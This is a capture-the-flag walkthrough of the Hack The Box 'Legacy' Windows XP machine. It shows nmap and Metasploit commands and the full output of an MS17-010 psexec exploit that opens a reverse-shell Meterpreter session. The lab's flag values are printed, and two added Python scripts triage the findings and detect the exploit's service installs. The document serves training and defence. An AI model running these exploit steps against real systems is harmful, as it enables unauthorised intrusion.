This writeup is for the machine from Hackthebox – Legacy. Let’s see how we can get into the machine.
Machine Name: Legacy
IP address: 10.10.10.4
OS: Windows
First we start with enumeration using the nmap tool. The command I used is the intense scan over all TCP ports:
nmap -p 1-65535 -T4 -A -v 10.10.10.4
The scan found two open ports:

PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
Now we know the machine is running an older version of Windows with SMB services exposed. At this stage we can expect most of the classic SMB vulnerabilities to apply, so I decided to find out which of them this machine is actually affected by. I tried the Nmap scripts first, but the scripts shipped with the current Nmap version do not include a single check for these vulnerabilities. So I googled it and found a repository on GitHub that contains a lot of extra Nmap scripts; the repository can be found here.
I decided to run the script “smb-check-vulns.nse”. I downloaded it, added it to my Nmap scripts directory and ran it with the following nmap command:
nmap --script smb-check-vulns --script-args unsafe=1 10.10.10.4
Nmap returned this result:

Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
From this result we learn that the target is vulnerable to MS08-067. I decided not to exploit this one and to go for a different vulnerability instead, because MS08-067 is very easy and very common.
The SMB service has had a lot of vulnerabilities. For example, the most notorious ransomware, WannaCry and Petya, used the EternalBlue vulnerability in the SMB service.
Let's dig further into the target. I decided to run the auxiliary SMB version scanner in Metasploit and got this result:
msf5 auxiliary(scanner/smb/smb_version) > run

[+] 10.10.10.4:445 - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Now we have solid confirmation that the target is running Windows XP SP3. I then googled the exploit for EternalBlue and found that the corresponding bulletin is MS17-010. I searched for it in Metasploit and found this:
msf5 auxiliary(scanner/smb/smb_ms17_010) > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Now we have a list of modules related to MS17-010. I decided to confirm with the auxiliary scanner module before exploiting the vulnerability:

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
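The three scanner outputs above (the nmap smb-check-vulns block, the Metasploit smb_version line and the smb_ms17_010 line) are exactly what a defender would want to turn into a ranked remediation list. The following Python script is an added example written for this writeup, not code from the post or from Nmap or Metasploit; it parses constructed copies of those three fragments, flags only the checks that actually report VULNERABLE, and adds two findings the author's output shows but does not call out: the operating system is end-of-life, and SMB signing is merely optional. The list of end-of-life releases is an assumption the reader would maintain.

```python
"""Remediation triage for the scanner output quoted above (added example).

Parses three text fragments in the shape the writeup shows: the nmap
smb-check-vulns host-script block, the Metasploit smb_version line and
the smb_ms17_010 line, and turns them into ranked findings with a fix.
"""
import re
from dataclasses import dataclass

# Constructed samples, copied in shape from the writeup's scanner output.
NMAP_SMB_CHECK = """Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
"""
MSF_SMB_VERSION = ("[+] 10.10.10.4:445 - Host is running Windows XP SP3 (language:English) "
                   "(name:LEGACY) (workgroup:HTB ) (signatures:optional)")
MSF_MS17_010 = "[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1"

# Assumption: the reader maintains this list; these releases no longer get security updates.
EOL_OS_PREFIXES = ("Windows XP", "Windows 2000", "Windows Server 2003")
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2}

HOST_RE = re.compile(r"(?P<host>\d{1,3}(?:\.\d{1,3}){3}):445")
VERSION_RE = re.compile(r"Host is running (?P<os>.+?) \(language:.*\(signatures:(?P<sig>\w+)\)")
MS17_RE = re.compile(r"likely VULNERABLE to (?P<bulletin>MS17-010)")
# One NSE result line: "|   MS08-067: VULNERABLE" or "|_  MS07-029: NO SERVICE (...)"
NSE_LINE_RE = re.compile(r"^\|_?\s+(?P<check>[^:\n]+): (?P<status>.+)$", re.M)


@dataclass
class Finding:
    host: str
    issue: str
    severity: str
    fix: str


def host_of(line):
    m = HOST_RE.search(line)
    return m.group("host") if m else "unknown"


def findings_from_nse(text, host):
    """Only checks whose status is exactly VULNERABLE become findings;
    'NOT VULNERABLE', 'Likely CLEAN' and 'NO SERVICE' are informational."""
    out = []
    for m in NSE_LINE_RE.finditer(text):
        if m.group("status").strip() == "VULNERABLE":
            check = m.group("check")
            out.append(Finding(host, f"{check} reported VULNERABLE by smb-check-vulns",
                               "critical", f"Install the {check} update or retire the host"))
    return out


def findings_from_version(line):
    """End-of-life OS and non-mandatory SMB signing, both visible in the smb_version line."""
    host = host_of(line)
    out = []
    m = VERSION_RE.search(line)
    if not m:
        return out
    os_name, sig = m.group("os"), m.group("sig")
    if os_name.startswith(EOL_OS_PREFIXES):
        out.append(Finding(host, f"End-of-life operating system: {os_name}", "high",
                           "Migrate to a supported Windows release; no further patches will arrive"))
    if sig != "required":
        out.append(Finding(host, f"SMB signing is {sig}", "medium",
                           "Require SMB signing so sessions cannot be relayed or tampered with"))
    return out


def findings_from_ms17(line):
    m = MS17_RE.search(line)
    if not m:
        return []
    return [Finding(host_of(line), f"{m.group('bulletin')} likely present (smb_ms17_010)",
                    "critical", "Apply the MS17-010 update and disable SMBv1")]


def triage(nse_text, version_line, ms17_line):
    """Combine all three sources and order the findings most severe first."""
    host = host_of(version_line)
    found = (findings_from_nse(nse_text, host) + findings_from_version(version_line)
             + findings_from_ms17(ms17_line))
    return sorted(found, key=lambda f: (SEVERITY_RANK[f.severity], f.issue))


if __name__ == "__main__":
    for f in triage(NMAP_SMB_CHECK, MSF_SMB_VERSION, MSF_MS17_010):
        print(f"[{f.severity:>8}] {f.host}: {f.issue} -> {f.fix}")
```

Run as-is it prints four findings for 10.10.10.4: MS08-067 and MS17-010 as critical, the end-of-life OS as high, and optional SMB signing as medium. The status comparison is deliberately exact so that "NOT VULNERABLE" never produces a finding.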
We are good to go with MS17-010. I chose the exploit “exploit/windows/smb/ms17_010_psexec” because it is the one that gives access to the target machine through remote code execution.

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.23:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x81b5ada8
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... zgSQbpWz.exe
[*] 10.10.10.4:445 - Created \zgSQbpWz.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \zgSQbpWz.exe...
[*] Meterpreter session 2 opened (10.10.14.23:4444 -> 10.10.10.4:1031) at 2019-10-25 12:47:00 -0400

meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
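The exploit log above leaves a very recognisable trail on the victim: a randomly named .exe is uploaded, registered and started as a service, then deleted. On Windows the Service Control Manager records every new service in the System log as Event ID 7045 with the service name and image path, so that record survives even after the binary is removed. The script below is an added example for this writeup, not part of the post or of Metasploit: it runs a simple detection over constructed 7045 records (the field names are an assumption about how a log forwarder would flatten them) and flags services whose name looks machine-generated, like zgSQbpWz, or whose binary sits directly in the Windows root or behind an administrative share.

```python
"""Detection over service-install events (added example, not part of the writeup).

Flags Event ID 7045 records whose service or binary name looks randomly
generated, or whose image path points straight at the Windows directory or
an administrative share, the pattern the psexec-style exploit output shows.
"""
import re

# Constructed sample events, flattened the way a log forwarder might present them
# (assumed field names: EventID, Computer, ServiceName, ImagePath).
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "LEGACY", "ServiceName": "Windows Update",
     "ImagePath": r"C:\WINDOWS\system32\svchost.exe -k netsvcs"},
    {"EventID": 7045, "Computer": "LEGACY", "ServiceName": "VMTools",
     "ImagePath": r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"},
    {"EventID": 7036, "Computer": "LEGACY", "ServiceName": "VMTools", "State": "running"},
    # Shaped after the writeup's "Created \zgSQbpWz.exe ... Service started successfully"
    {"EventID": 7045, "Computer": "LEGACY", "ServiceName": "zgSQbpWz",
     "ImagePath": r"%SystemRoot%\zgSQbpWz.exe"},
]

VOWELS = set("aeiouAEIOU")
EXE_RE = re.compile(r'"?(?P<exe>[^"]+?\.exe)', re.I)
# Directly under the Windows directory, or reached through an administrative share.
ROOT_DIR_RE = re.compile(r"^(?:%SystemRoot%|[A-Za-z]:\\windows)\\[^\\]+\.exe$", re.I)
ADMIN_SHARE_RE = re.compile(r"^\\\\[^\\]+\\(?:ADMIN|[A-Za-z])\$\\[^\\]+\.exe$", re.I)


def looks_random(name):
    """Heuristic for machine-generated names like zgSQbpWz: eight alphanumerics,
    mixed case, and almost no vowels. Human-chosen names rarely fit all three."""
    if len(name) != 8 or not name.isalnum():
        return False
    if not (any(c.isupper() for c in name) and any(c.islower() for c in name)):
        return False
    return sum(c in VOWELS for c in name) / len(name) < 0.25


def executable_of(image_path):
    """Strip service arguments such as '-k netsvcs' and keep the .exe path."""
    m = EXE_RE.match(image_path.strip())
    return m.group("exe") if m else image_path.strip()


def unusual_location(exe_path):
    return bool(ROOT_DIR_RE.match(exe_path) or ADMIN_SHARE_RE.match(exe_path))


def reasons_for(event):
    reasons = []
    exe = executable_of(event.get("ImagePath", ""))
    base = exe.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    if looks_random(event.get("ServiceName", "")) or looks_random(base):
        reasons.append("random-looking service or binary name")
    if unusual_location(exe):
        reasons.append("binary installed directly in the Windows root or via an admin share")
    return reasons


def detect(events):
    """Return one alert per 7045 record that triggers at least one heuristic."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 7045:
            continue
        reasons = reasons_for(ev)
        if reasons:
            alerts.append({"Computer": ev["Computer"], "ServiceName": ev["ServiceName"],
                           "ImagePath": ev["ImagePath"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['Computer']}: service {a['ServiceName']} ({a['ImagePath']}): "
              + "; ".join(a["reasons"]))
```

On the constructed sample only the zgSQbpWz service is reported, with both reasons. Neither heuristic is proof on its own; a service registered this way and deleted seconds later is the thing to correlate with, which is why the 7045 record matters more than the file itself.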
Now that we have admin-level access to the target machine, let's get the flags:

meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 02:19:32 -0400  user.txt

meterpreter > cat user.txt
e69af0e4f443de7e36876fda4ec7644f

meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 02:18:19 -0400  root.txt

meterpreter > cat root.txt
993442d258b0e0ec917cae9e695d5713
We got both flags easily. Piece of cake.
Some time later I came across the module “exploit/windows/smb/doublepulsar_rce”, the DOUBLEPULSAR Payload Execution and Neutralization exploit for SMB. I think this would also work on our target. If you guys want, try this one as well.
Happy Ethical Hacking 🙂